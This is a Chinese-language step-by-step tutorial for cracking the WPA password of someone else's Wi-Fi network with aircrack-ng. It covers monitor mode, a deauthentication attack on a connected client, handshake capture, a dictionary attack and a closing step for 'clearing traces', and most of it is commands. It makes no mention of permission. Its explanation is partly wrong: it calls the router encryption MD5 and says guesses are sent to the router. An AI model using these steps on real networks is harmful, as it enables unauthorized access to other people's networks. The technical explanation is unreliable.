系统平台:Ubuntu15.04
工 具:aircrack1.2
1、aircrack获取
(1)安装aircrack
下载地址:http://download.aircrack-ng.org/aircrack-ng-1.2-rc2.tar.gz
命令为 wgethttp://download.aircrack-ng.org/aircrack-ng-1.2-rc2.tar.gz
在网页中下载也行
下载下来的是一个压缩包,利用命令
tar -zxvf aircrack-ng-1.2-beta1.tar.gz解压压缩包(aircrack-ng-1.2-beta1.tar.gz 是你下载的压缩包的文件名)
然后用make和make INSTALL安装
(2)配置
安装组件只要输入
sudo apt-get install build-essential libssl-dev pkg-config libnl-3-dev libnl-genl-3-dev
2、wifi破解密码
破解密码的原理是将本机的网卡更改为监听模式监听周围的wifi网络,寻找到目标的MAC地址,然后模拟客户机向对方路由器发送断开链接的请求,而路由器在断开连接的时候会自动链接,这个时候截获路由器的握手包即可,密码文件就包含在其中,之后利用密码字典破解。路由器密码的加密算法一般是MD5等,并且是不可逆的意思是无法从密文揭秘出密码,我们做的是暴力破解,将字典中的密码发送给路由器直到成功为止,所以成功与否和你的密码字典丰富度有关。
(1)、关闭网络和会影响到破解的进程
如果不进行这一步,在进行网络监听的时候会无法获得正确的信息
关闭网络功能
service net-manager stop
关闭相关进程
sudo airmon-ng check kill
(2)、打开网络监听
iwconfig 命令查看本机的网卡,可以看到我的电脑上有一块无线网卡wlan0打开网络监听
airmon-ng start wlan0
wlan0为你选择的网卡的名称,并且我们可以在右下角看到接口名
(3)监听网络wifi
监听所有wifi(这个窗口可以关掉)
sudo airodump-ng mon0
可以看到周围的网络的一些信息,我们要用到的是BSSID,CH,ESSID。BSSID是路由器的MAC地址,CH是路由器wifi所在的频道,ESSID为WIFI的名字。
监听特定的频道
sudo airodump-ng --bssid EC:X:X:X:X:A4 -c 11 -w ./crack/tmp mon0
其中--bssid后的EC:X:X:X:X:A4是我们在上一条命令中读取到的MAC地址;
--c后面的参数是频道
--w后是要写入的文件名称(我写在当前目录下的crack目录中的tmp文件中)
mon0为之前使用到的接口名称
这个窗口不要关闭,也不要结束进程
BSSID下面是我们选定的路由器的MAC地址,STATION下面是链接在路由器上的MAC地址,我们要用到这两个
(4)获取握手包
获取握手数据包,新开一个终端,执行
sudo aireplay-ng -0 2 -a EC:X:X:X:X:A4 -c 04:X:X:X:X:37 mon0
-a后面的参数是我们选择的路由器的MAC地址
-c后面的参数是对应的客户机的MAC地址
当上一步时间后面出现WAP handshake时说明获取成功
(5)破解密码
当出现WPA handshake时表示握手成功即可破解文件
然后执行
aircrack-ng -w 1.txt tmp-02.cap
1.txt为密码字典文件
tmp-02.cap为握手文件
这个过程需要等待,执行速度和计算机的性能有关,可能并不能发现密码,可以多换几个密码字典尝试
字典文件百度下载即可。
3、清除痕迹
执行下面两条命令
关闭网络监听
airmon-ng stop mon0
打开网络
service network-manager start